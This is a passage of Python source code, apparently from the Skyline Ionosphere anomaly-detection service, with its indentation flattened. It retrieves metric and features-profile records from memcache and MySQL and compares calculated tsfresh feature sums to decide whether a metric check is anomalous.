query_metric_table = False
metrics_id = int(memcache_metric_dict['id'])
metric_ionosphere_enabled = int(memcache_metric_dict['ionosphere_enabled'])
metrics_db_object = memcache_metric_dict
if metric_ionosphere_enabled is not None:
training_metric = False
else:
training_metric = True
logger.info('using %s key data from memcache' % metrics_db_object_key)
# Check if the metric has ionosphere_enabled, if not remove the check
# file but not the data directory
# @modified 20161230 - Feature #1830: Ionosphere alerts
# Use SQLAlchemy method
# query = "SELECT ionosphere_enabled FROM metrics WHERE metric='%s'" % metric
# result = mysql_select(skyline_app, query)
# if str(result[0]) != '1':
# logger.info('Ionosphere not enabled on %s' % (metric))
# # @modified 20161222 - do not remove metric file until features
# # calculated
# # self.remove_metric_check_file(str(metric_check_file))
# # return
# training_metric = True
# @modified 20170825 - Task #2132: Optimise Ionosphere DB usage
# If no memcache data then MySQL query_metric_table
if query_metric_table:
try:
engine, log_msg, trace = get_an_engine()
logger.info(log_msg)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to determine ionosphere_enabled')
if not engine:
logger.error('error :: engine not obtained to determine ionosphere_enabled')
# Get the metrics_table metadata
metrics_table = None
try:
metrics_table, log_msg, trace = metrics_table_meta(skyline_app, engine)
logger.info('metrics_table OK for %s' % base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get metrics_table meta for %s' % base_name)
try:
connection = engine.connect()
# stmt = select([metrics_table.c.ionosphere_enabled]).where(metrics_table.c.metric == str(metric))
stmt = select([metrics_table]).where(metrics_table.c.metric == base_name)
result = connection.execute(stmt)
try:
result
except:
logger.error(traceback.format_exc())
logger.error('error :: got no result from MySQL from metrics table for - %s' % base_name)
row = result.fetchone()
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# @modified - 20180524 - Task #2132: Optimise Ionosphere DB usage
# Feature #2378: Add redis auth to Skyline and rebrow
# Wrapped memcache_metrics_db_object, metrics_id,
# metric_ionosphere_enabled and metrics_db_object in if row
# as if row is None it can fail with:
# TypeError: 'NoneType' object is not iterable
# memcache_metrics_db_object = dict(row)
if row:
memcache_metrics_db_object = dict(row)
metrics_id = row['id']
metric_ionosphere_enabled = row['ionosphere_enabled']
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the metrics_db_object so it is available throughout
# Here we go! Learn!
metrics_db_object = row
else:
logger.info('could not determine metric id for %s' % base_name)
connection.close()
if metric_ionosphere_enabled is not None:
training_metric = False
else:
# @modified 20161222 - do not remove metric file until features
# calculated
# self.remove_metric_check_file(str(metric_check_file))
# return
training_metric = True
# self.training_metrics.append(base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine ionosphere_enabled from metrics table for - %s' % base_name)
metric_ionosphere_enabled = None
training_metric = True
# self.training_metrics.append(base_name)
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# Add the metric db object data to memcache
if settings.MEMCACHE_ENABLED and query_metric_table:
try:
memcache_metric_dict = {}
for k, v in memcache_metrics_db_object.iteritems():
key_name = str(k)
key_value = str(v)
memcache_metric_dict[key_name] = key_value
self.memcache_client.set(metrics_db_object_key, memcache_metric_dict, expire=3600)
logger.info('set the memcache key - %s' % metrics_db_object_key)
except:
logger.error('error :: failed to set %s from memcache' % metrics_db_object_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
# @added 20170116 - Feature #1854: Ionosphere learn - generations
# If this is added_by ionosphere_learn the id is only
# added if the use_full_duration_days features profile
# is less than max_generations as if it is at the max
# then a new features profile cannot be created from it
# even if it is a match.
metric_max_generations = None
if added_by == 'ionosphere_learn':
try:
metric_max_generations = int(metrics_db_object['max_generations'])
logger.info('determing max_generations for ionosphere_learn check - %s - %s' % (str(metric_max_generations), base_name))
except:
logger.error(traceback.format_exc())
logger.error('error ::ionosphere_learn check could not determine the metric max_generations from the metrics_db_object for %s' % base_name)
if not metric_max_generations:
logger.error('error ::ionosphere_learn check cannot continue without max_generations for %s' % base_name)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20170108 - Feature #1830: Ionosphere alerts
# Only process smtp_alerter_metrics
if training_metric:
if base_name in self.ionosphere_non_smtp_alerter_metrics:
logger.error('error :: Ionosphere does not handle metrics that do not have a smtp alert context removing check for %s' % (base_name))
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
self.training_metrics.append(base_name)
logger.info(
'ionosphere_enabled is %s for metric id %s - %s' % (
str(metric_ionosphere_enabled), str(metrics_id),
base_name))
if training_metric:
logger.info('Ionosphere is not enabled on %s' % (base_name))
else:
logger.info('Ionosphere is enabled on %s' % (base_name))
# @added 20161210 - Branch #922: ionosphere
# Task #1658: Patterning Skyline Ionosphere
# Only continue if there is a training data json timeseries file
metric_timeseries_dir = base_name.replace('.', '/')
# @modified 20170115 - Feature #1854: Ionosphere learn
# Allowing the bifurcation of the metric_training_data_dir based on
# whether added_by is ionosphere_learn or not, this allows Ionosphere to
# be brought online to start evaluating the learn features profiles at
# 30 days or whatever the learn_full_duration_days is for the metric
# that is being automatically learnt uses these fuller duration features
# to determine if a new training data set has been created for an
# ionosphere_enabled metric. Here Ionosphere starts to try and get
# clever, let us hope not too clever, but this is where the
# max_percent_diff_from_origin and max_generations comes in. So ...
# here we go, a really "Crazy feedback loop" @astanway :) I would say
# that this is going to be way more useful than the last referenced one
# in https://github.com/etsy/skyline/pull/90#r13592782 ;) This is it
# 20170115202500 UTC Ionosphere really is now really going to begin.
# Here we go! Learn!
# metric_training_data_dir = '%s/%s/%s' % (
# settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
# metric_timeseries_dir)
if added_by != 'ionosphere_learn':
metric_training_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
metric_timeseries_dir)
else:
# Here we go! Learn you bugger! SUCH A BIG THANKS TO tsfresh!
# And flowjob and The White Stripes, @matzhouse, her and the Dude.
metric_training_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_LEARN_FOLDER, metric_timestamp,
metric_timeseries_dir)
anomaly_json = '%s/%s.json' % (metric_training_data_dir, base_name)
if os.path.isfile(anomaly_json):
logger.info('training data ts json available - %s' % (anomaly_json))
else:
logger.error('error :: training data ts json was not found - %s' % (anomaly_json))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# The timeseries full_duration needs to be recorded to allow Mirage metrics to
# be profiled on Redis timeseries data at FULL_DURATION
# e.g. mirage.redis.24h.json
if training_metric:
logger.info('training metric - %s' % (base_name))
if added_by == 'mirage':
logger.info('checking training data Redis json is available')
# Always calculate features for both the SECOND_ORDER_RESOLUTION_SECONDS
# timeseries data and the FULL_DURATION Redis timeseries data.
# It is always preferable to create a features profile on a FULL_DURATION
# data set, unless the user is flagging the actual Mirage timeseries as
# not anomalous. In the Mirage context the not anomalous may often be more
# "visibile" in the FULL_DURATION view and if so should be matched on the
# FULL_DURATION timeseries data, even if it is a Mirage metric.
# Features profiles can be created for a Mirage metric on both the
# FULL_DURATION and the SECOND_ORDER_RESOLUTION_SECONDS data sets, however
# only one should be needed.
# A features profile should always be created at the highest resolution
# possible, FULL_DURATION data, wherever possible.
try:
full_duration_hours = str(int(settings.FULL_DURATION / 3600))
redis_anomaly_json = '%s/%s.mirage.redis.%sh.json' % (metric_training_data_dir, base_name, full_duration_hours)
if os.path.isfile(redis_anomaly_json):
logger.info('training data Redis full duration ts json available - %s' % (redis_anomaly_json))
else:
logger.info('no training data Redis full duration json was not found - %s' % (redis_anomaly_json))
except:
logger.error(traceback.format_exc())
logger.error('error :: training data Redis full duration json was not found - %s' % (redis_anomaly_json))
# @added 20161209 - Branch #922: ionosphere
# Task #1658: Patterning Skyline Ionosphere
# Use SQLAlchemy, mysql.connector is still upstairs ^^ but starting the
# move to SQLAlchemy now that all the webapp Ionosphere SQLAlchemy
# patterns work and the database lay out if defined we can begin on the
# data side. Ionosphere was put together backwards, like tsfresh was
# learnt. It was the people input first here in many ways, which is
# exactly how it was suppose to be.
# This is now the Ionosphere meat.
# Get a MySQL engine only if not training_metric
if not training_metric:
if not metrics_id:
logger.error('error :: metric id not known')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return False
# @added 20170101 - Feature #1836: ionosphere - local features profiles disk cache
# Cache fp ids for 300 seconds?
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
logger.info('getting MySQL engine')
try:
engine, log_msg, trace = get_an_engine()
logger.info(log_msg)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to get fp_ids')
if not engine:
logger.error('error :: engine not obtained to get fp_ids')
try:
ionosphere_table, log_msg, trace = ionosphere_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere_table meta for %s' % base_name)
# Determine the fp_ids that exist for the metric
fp_ids = []
fp_ids_found = False
# @added 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Added all_fp_ids so that we can handle multiple durations and not
# error and reminds me of the needed metrics by FULL_DURATION
# ionosphere.analyzer.unique_metrics (at FULL_DURATION)
# ionosphere.mirage.unique_metrics (NOT at FULL_DURATION)
all_fp_ids = []
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the fp_ids_db_object so it is available to determine all
# the details of all features profiles for the metric, this has all
# the generations values avaialble in it.
# Here we go! Learn!
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# fp_ids_db_object = None
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly.
# Set result to None here to fix a interpolation error below
result = None
fp_layers_ids = []
fp_layers_present = False
try:
connection = engine.connect()
# @modified 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# Order by the latest features profile, this also results in the
# layers ids being ordered by latest too.
# stmt = select([ionosphere_table]).where(ionosphere_table.c.metric_id == metrics_id)
stmt = select([ionosphere_table]).where(ionosphere_table.c.metric_id == metrics_id).order_by(desc(ionosphere_table.c.id))
result = connection.execute(stmt)
for row in result:
# @added 20170116 - Feature #1854: Ionosphere learn
# if a features profiles is not enabled or deleted, skip it
if row['enabled'] != 1:
continue
if row['deleted'] == 1:
continue
fp_id = row['id']
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly
fp_layers_id = int(row['layers_id'])
if fp_layers_id > 0:
fp_layers_present = True
# @modified 20181013 - Feature #2430: Ionosphere validate learnt features profiles page
# Only add the fp_layers_id if > 0
# fp_layers_ids.append(fp_layers_id)
if fp_layers_id > 0:
if fp_layers_id not in fp_layers_ids:
fp_layers_ids.append(fp_layers_id)
# @added 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Added all_fp_ids
all_fp_ids.append(int(fp_id))
if int(row['full_duration']) == int(full_duration):
# @modified 20170116 - Feature #1854: Ionosphere learn - generations
# Handle ionosphere_learn
if added_by != 'ionosphere_learn':
fp_ids.append(int(fp_id))
logger.info('using fp id %s matched full_duration %s - %s' % (str(fp_id), str(full_duration), base_name))
else:
# @added 20170116 - Feature #1854: Ionosphere learn - generations
# If this is added_by ionosphere_learn the id is only
# added if the use_full_duration_days features profile
# is less than max_generations as if it is at the max
# then a new features profile cannot be created from it
# even if it is were to match. Ionosphere learn is
# limited here on generation.
# Set the default as max e.g. not allowed
current_fp_generation = int(metric_max_generations)
try:
current_fp_generation = row['generation']
if int(current_fp_generation) < int(metric_max_generations):
fp_ids.append(int(fp_id))
logger.info(
'valid ionosphere_learn generation %s - fp id %s matched full_duration %s - %s' % (
str(current_fp_generation), str(fp_id),
str(full_duration), base_name))
else:
logger.info(
'ionosphere_learn cannot check due to max_generations of %s would be exceeded, current generation %s - fp id %s matched full_duration %s - %s' % (
str(metric_max_generations), str(current_fp_generation), str(fp_id),
str(full_duration), base_name))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: ionosphere_learn check could not determine the fp generation of fp id %s from the row object for %s' % (
str(fp_id), base_name))
else:
logger.info('not using fp id %s not matched full_duration %s - %s' % (str(fp_id), str(full_duration), base_name))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the fp_ids_db_object so it is available throughout
# Here we go! Learn!
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# fp_ids_db_object = row
connection.close()
fp_count = len(fp_ids)
logger.info('determined %s fp ids for %s' % (str(fp_count), base_name))
# @added 20170309 - Feature #1960: ionosphere_layers
fp_layers_count = len(fp_layers_ids)
logger.info('determined %s layers ids for %s' % (str(fp_layers_count), base_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine fp ids from DB for %s' % base_name)
fp_count = 0
# @added 20170309 - Feature #1960: ionosphere_layers
fp_layers_count = 0
# @added 20170306 - Feature #1960: ionosphere_layers
# Corrected the interpolation of the fp_ids_db_object above where it
# was set to the last row only, however it was not used anyway.
# Here we go, let us TEACH you properly. We only evaluate
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# if result:
# fp_ids_db_object = result
if len(fp_ids) == 0:
logger.info('there are no fp ids that match full duration for %s' % base_name)
else:
fp_ids_found = True
if not fp_ids_found:
logger.info('no fp ids were found for %s at %s' % (base_name, str(full_duration)))
# @modified 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Use all_fp_ids so that we can handle multiple durations
# fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if len(all_fp_ids) == 0:
logger.error('error :: Ionosphere is enabled on %s but has no feature_profiles' % (base_name))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
else:
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20161221 - TODO: why not calculate the features of every
# anomaly so the the use does not have to do it and wait for the
# features to be calculated.
# Check the features were calculated by the webapp
calculated_feature_file = '%s/%s.tsfresh.input.csv.features.transposed.csv' % (metric_training_data_dir, base_name)
calculated_feature_file_found = False
if os.path.isfile(calculated_feature_file):
logger.info('calculated features available - %s' % (calculated_feature_file))
calculated_feature_file_found = True
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# ionosphere_learn should always provide the features profile csv
# Ionosphere does not create features profiles for learn, it only
# checks them.
# Here we go! Learn!
if added_by == 'ionosphere_learn':
if not calculated_feature_file_found:
logger.error('error :: no ionosphere_learn calculated_feature_file file found - %s' % calculated_feature_file)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
if not calculated_feature_file_found:
if training_metric:
# Allow Graphite resources to be created if they are not an alert
# was not sent therefore features do not need to be calculated
check_time = int(time())
check_age = check_time - int(added_at)
if check_age < 5:
sleep(5)
graphite_file_count = len([f for f in os.listdir(metric_training_data_dir)
if f.endswith('.png') and
os.path.isfile(os.path.join(metric_training_data_dir, f))])
if graphite_file_count == 0:
logger.info('not calculating features no anomaly Graphite alert resources created in %s' % (metric_training_data_dir))
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
logger.info('anomaly Graphite alert resources found in %s' % (metric_training_data_dir))
context = skyline_app
f_calc = None
if not calculated_feature_file_found:
try:
fp_csv, successful, fp_exists, fp_id, log_msg, traceback_format_exc, f_calc = calculate_features_profile(skyline_app, metric_timestamp, base_name, context)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate features')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
if os.path.isfile(calculated_feature_file):
logger.info('calculated features available - %s' % (calculated_feature_file))
calculated_feature_file_found = True
if f_calc:
send_metric_name = '%s.features_calculation_time' % skyline_app_graphite_namespace
f_calc_time = '%.2f' % float(f_calc)
try:
send_graphite_metric(skyline_app, send_metric_name, f_calc_time)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to send calculate features')
if training_metric:
logger.info('training metric done')
self.remove_metric_check_file(str(metric_check_file))
# TODO: make ionosphere more useful, compare any other
# available training_metric profiles here and match, not in the
# db context, in the training context.
if engine:
engine_disposal(engine)
return
if not calculated_feature_file_found:
logger.error('error :: calculated features file not available - %s' % (calculated_feature_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @modified 20161213 - Branch #1790: test_tsfresh
# TODO: Match the test_tsfresh method
# Create an array of the calculated features
calculated_features = []
if calculated_feature_file_found:
count_id = 0
with open(calculated_feature_file, 'rb') as fr:
reader = csv.reader(fr, delimiter=',')
for i, line in enumerate(reader):
if str(line[0]) != '':
if ',' in line[0]:
feature_name = '"%s"' % str(line[0])
else:
feature_name = str(line[0])
count_id += 1
calc_value = float(line[1])
calculated_features.append([feature_name, calc_value])
if len(calculated_features) == 0:
logger.error('error :: no calculated features were determined from - %s' % (calculated_feature_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_checked = 0
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked = 0
layers_checked_count = 0
# Compare calculated features to feature values for each fp id
not_anomalous = False
if calculated_feature_file_found:
for fp_id in fp_ids:
if not metrics_id:
logger.error('error :: metric id not known')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return False
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_checked += 1
self.features_profiles_checked.append(fp_id)
features_count = None
fp_features = []
# Get features for fp_id from z_fp_<metric_id> table where the
# features profile is the same full_duration
metric_fp_table = 'z_fp_%s' % str(metrics_id)
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine for feature_id and values from %s' % metric_fp_table)
if not engine:
logger.error('error :: engine not obtained for feature_id and values from %s' % metric_fp_table)
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
# First check to determine if the fp_id has data in memcache
# before querying the database
fp_id_feature_values = None
if settings.MEMCACHE_ENABLED:
fp_id_feature_values_key = 'fp.id.%s.feature.values' % str(fp_id)
try:
fp_id_feature_values = self.memcache_client.get(fp_id_feature_values_key)
# if memcache does not have the key the response to the
# client is None, it does not except
except:
logger.error('error :: failed to get %s from memcache' % fp_id_feature_values_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
if fp_id_feature_values:
fp_features = literal_eval(fp_id_feature_values)
logger.info('using memcache %s key data' % fp_id_feature_values_key)
if not fp_features:
try:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
stmt = 'SELECT feature_id, value FROM %s WHERE fp_id=%s' % (metric_fp_table, str(fp_id)) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
fp_feature_id = int(row['feature_id'])
fp_value = float(row['value'])
fp_features.append([fp_feature_id, fp_value])
connection.close()
features_count = len(fp_features)
logger.info('determined %s features for fp_id %s' % (str(features_count), str(fp_id)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine feature_id, value from %s' % metric_fp_table)
if fp_features and settings.MEMCACHE_ENABLED:
fp_id_feature_values_key = 'fp.id.%s.feature.values' % str(fp_id)
try:
self.memcache_client.set(fp_id_feature_values_key, fp_features)
logger.info('populated memcache %s key' % fp_id_feature_values_key)
except:
logger.error('error :: failed to set %s in memcache' % fp_id_feature_values_key)
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
if settings.MEMCACHE_ENABLED:
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
# @added 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
# Added the calculated features sum for verification purposes
all_calc_features_sum_list = []
for feature_name, calc_value in calculated_features:
all_calc_features_sum_list.append(float(calc_value))
all_calc_features_sum = sum(all_calc_features_sum_list)
# Convert feature names in calculated_features to their id
logger.info('converting tsfresh feature names to Skyline feature ids')
calc_features_by_id = []
for feature_name, calc_value in calculated_features:
for skyline_feature_id, name in TSFRESH_FEATURES:
if feature_name == name:
calc_features_by_id.append([skyline_feature_id, float(calc_value)])
# Determine what features each data has, extract only values for
# common features.
logger.info('determining common features')
relevant_fp_feature_values = []
relevant_calc_feature_values = []
for skyline_feature_id, calc_value in calc_features_by_id:
for fp_feature_id, fp_value in fp_features:
if skyline_feature_id == fp_feature_id:
relevant_fp_feature_values.append(fp_value)
relevant_calc_feature_values.append(calc_value)
# Determine the sum of each set
relevant_fp_feature_values_count = len(relevant_fp_feature_values)
relevant_calc_feature_values_count = len(relevant_calc_feature_values)
if relevant_fp_feature_values_count != relevant_calc_feature_values_count:
logger.error('error :: mismatch in number of common features')
logger.error('error :: relevant_fp_feature_values_count - %s' % str(relevant_fp_feature_values_count))
logger.error('error :: relevant_calc_feature_values_count - %s' % str(relevant_calc_feature_values_count))
continue
else:
logger.info('comparing on %s common features' % str(relevant_fp_feature_values_count))
if relevant_fp_feature_values_count == 0:
logger.error('error :: relevant_fp_feature_values_count is zero')
continue
# Determine the sum of each set
sum_fp_values = sum(relevant_fp_feature_values)
sum_calc_values = sum(relevant_calc_feature_values)
logger.info(
'sum of the values of the %s common features in features profile - %s' % (
str(relevant_fp_feature_values_count), str(sum_fp_values)))
logger.info(
'sum of the values of the %s common features in the calculated features - %s' % (
str(relevant_calc_feature_values_count), str(sum_calc_values)))
# Determine whether each set is positive or negative
# # if the same carry on
# # if both negative, make then both positive
# Sum fp values, Sum calculated - handle negatives like features_sum :: -3389570699080000.0000000000
# Determine whether each set is positive or negative
# # if the same carry on
# # if both negative, make then both positive postive_sums
fp_sum_array = [sum_fp_values]
calc_sum_array = [sum_calc_values]
percent_different = 100
sums_array = np.array([sum_fp_values, sum_calc_values], dtype=float)
try:
calc_percent_different = np.diff(sums_array) / sums_array[:-1] * 100.
percent_different = calc_percent_different[0]
logger.info('percent_different between common features sums - %s' % str(percent_different))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate percent_different')
continue
almost_equal = None
try:
np.testing.assert_array_almost_equal(fp_sum_array, calc_sum_array)
almost_equal = True
except:
almost_equal = False
if almost_equal:
not_anomalous = True
# @modified 20170118 - Bug #1860: Debug learn not matched in ionosphere
# This broke it, no variable was interpolated
# logger.info('common features sums are almost equal, not anomalous' % str(relevant_fp_feature_values_count))
logger.info('common features sums are almost equal, not anomalous')
# @added 20161229 - Feature #1830: Ionosphere alerts
# Update the features profile checked count and time
logger.info('updating checked details in db for %s' % (str(fp_id)))
# update matched_count in ionosphere_table
checked_timestamp = int(time())
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update checked details in db for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update checked details in db for %s' % (str(fp_id)))
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == fp_id).
values(checked_count=ionosphere_table.c.checked_count + 1,
last_checked=checked_timestamp))
connection.close()
logger.info('updated checked_count for %s' % str(fp_id))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update checked_count and last_checked for %s ' % str(fp_id))
# if diff_in_sums <= 1%:
if percent_different < 0:
new_pdiff = percent_different * -1
percent_different = new_pdiff
if percent_different < settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR:
not_anomalous = True
# log
logger.info('not anomalous - features profile match - %s' % base_name)
logger.info(
'calculated features sum are within %s percent of fp_id %s with %s, not anomalous' %
(str(settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR),
str(fp_id), str(percent_different)))
# @added 20180617 - Feature #2404: Ionosphere - fluid approximation
# Now if not matched use Min-Max scaling as per
# http://sebastianraschka.com/Articles/2014_about_feature_scaling.html#numpy
# Min-Max scale the fp time series z_ts_<metric_id> SELECT WHERE fp_id
# or from memcache to create minmax_fp_ts
# Min-Max scale the current time series to create minmax_anomalous_ts
# Create features profiles for minmax_fp_ts
# Create features profiles for minmax_anomalous_ts
try:
minmax_scaling_enabled = settings.IONOSPHERE_MINMAX_SCALING_ENABLED
except:
minmax_scaling_enabled = False
minmax_not_anomalous = False
minmax_check = False
minmax = 0
if not not_anomalous:
if minmax_scaling_enabled:
minmax_check = True
if added_by == 'ionosphere_learn' and minmax_check:
minmax_check = False
logger.info('ionosphere_learn job not minmax scaling')
if minmax_check:
logger.info('running minmax scaling')
# First check to determine if the z_ts_<mertic_id> for the fp
# has data in memcache before querying the database
metric_fp_ts_table = 'z_ts_%s' % str(metrics_id)
fp_id_metric_ts = []
if settings.MEMCACHE_ENABLED:
fp_id_metric_ts_key = 'fp.%s.%s.ts' % (str(fp_id), str(metrics_id))
try:
fp_id_metric_ts_object = self.memcache_client.get(fp_id_metric_ts_key)
# if memcache does not have the key the response to the
# client is None, it does not except
except:
logger.error('error :: failed to get %s from memcache' % fp_id_metric_ts_key)
try:
self.memcache_client.close()
except:
logger.error('error :: failed to close memcache_client')
if fp_id_metric_ts_object:
fp_id_metric_ts = literal_eval(fp_id_metric_ts_object)
logger.info('used memcache %s key data to populate fp_id_metric_ts with %s data points' % (fp_id_metric_ts_key, str(len(fp_id_metric_ts))))
else:
logger.info('no memcache %s key data, will use database' % fp_id_metric_ts_key)
if not fp_id_metric_ts:
if LOCAL_DEBUG:
logger.debug('debug :: getting data from %s database table for fp id %s to populate the fp_id_metric_ts list' % (metric_fp_ts_table, str(fp_id)))
try:
stmt = 'SELECT timestamp, value FROM %s WHERE fp_id=%s' % (metric_fp_ts_table, str(fp_id)) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
fp_id_ts_timestamp = int(row['timestamp'])
fp_id_ts_value = float(row['value'])
fp_id_metric_ts.append([fp_id_ts_timestamp, fp_id_ts_value])
connection.close()
values_count = len(fp_id_metric_ts)
logger.info('determined %s values for the fp_id time series %s for %s' % (str(values_count), str(fp_id), str(base_name)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine timestamps and values from %s' % metric_fp_ts_table)
if fp_id_metric_ts and settings.MEMCACHE_ENABLED:
fp_id_metric_ts_key = 'fp.%s.%s.ts' % (str(fp_id), str(metrics_id))
try:
self.memcache_client.set(fp_id_metric_ts_key, fp_id_metric_ts)
logger.info('populated memcache %s key' % fp_id_metric_ts_key)
except:
logger.error('error :: failed to set %s in memcache' % fp_id_metric_ts_key)
try:
self.memcache_client.close()
except:
logger.error('error :: failed to close memcache_client')
# Get anomalous time series
anomalous_ts_values_count = 0
if fp_id_metric_ts:
anomalous_timeseries_not_defined = True
try:
test_anomalous_timeseries = anomalous_timeseries
if len(test_anomalous_timeseries) > 0:
anomalous_timeseries_not_defined = False
except:
logger.info('anomalous_timeseries is not defined loading from anomaly json')
timeseries_dir = base_name.replace('.', '/')
metric_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
timeseries_dir)
anomaly_json = '%s/%s.json' % (metric_data_dir, base_name)
if anomalous_timeseries_not_defined:
try:
with open((anomaly_json), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
anomalous_timeseries = literal_eval(timeseries_array_str)
if len(anomalous_timeseries) > 0:
logger.info('anomalous_timeseries was populated from anomaly json %s with %s data points from for creating the minmax_anomalous_ts' % (anomaly_json, str(len(anomalous_timeseries))))
else:
logger.error('error :: anomalous_timeseries for minmax_anomalous_ts is not populated from anomaly json - %s' % anomaly_json)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not create anomalous_timeseries from anomaly json %s' % anomaly_json)
else:
logger.info('anomalous_timeseries has %s data points from for creating the minmax_anomalous_ts' % (str(len(anomalous_timeseries))))
anomalous_ts_values_count = len(anomalous_timeseries)
# @added 20180621 - Feature #2404: Ionosphere - fluid approximation
# Check ranges and only Min-Max scale if the 2 time series
# are similar in range
# @added 20180819 - Bug #2534: Ionosphere - fluid approximation - IONOSPHERE_MINMAX_SCALING_RANGE_TOLERANCE on low ranges
# TODO
try:
range_tolerance = settings.IONOSPHERE_MINMAX_SCALING_RANGE_TOLERANCE
except:
range_tolerance = 0.15
range_tolerance_percentage = range_tolerance * 100
check_range = False
range_similar = False
if fp_id_metric_ts:
if anomalous_ts_values_count > 0:
check_range = True
lower_range_similar = False
upper_range_similar = False
if check_range:
try:
minmax_fp_values = [x[1] for x in fp_id_metric_ts]
min_fp_value = min(minmax_fp_values)
max_fp_value = max(minmax_fp_values)
except:
min_fp_value = False
max_fp_value = False
try:
minmax_anomalous_values = [x2[1] for x2 in anomalous_timeseries]
min_anomalous_value = min(minmax_anomalous_values)
max_anomalous_value = max(minmax_anomalous_values)
except:
min_anomalous_value = False
max_anomalous_value = False
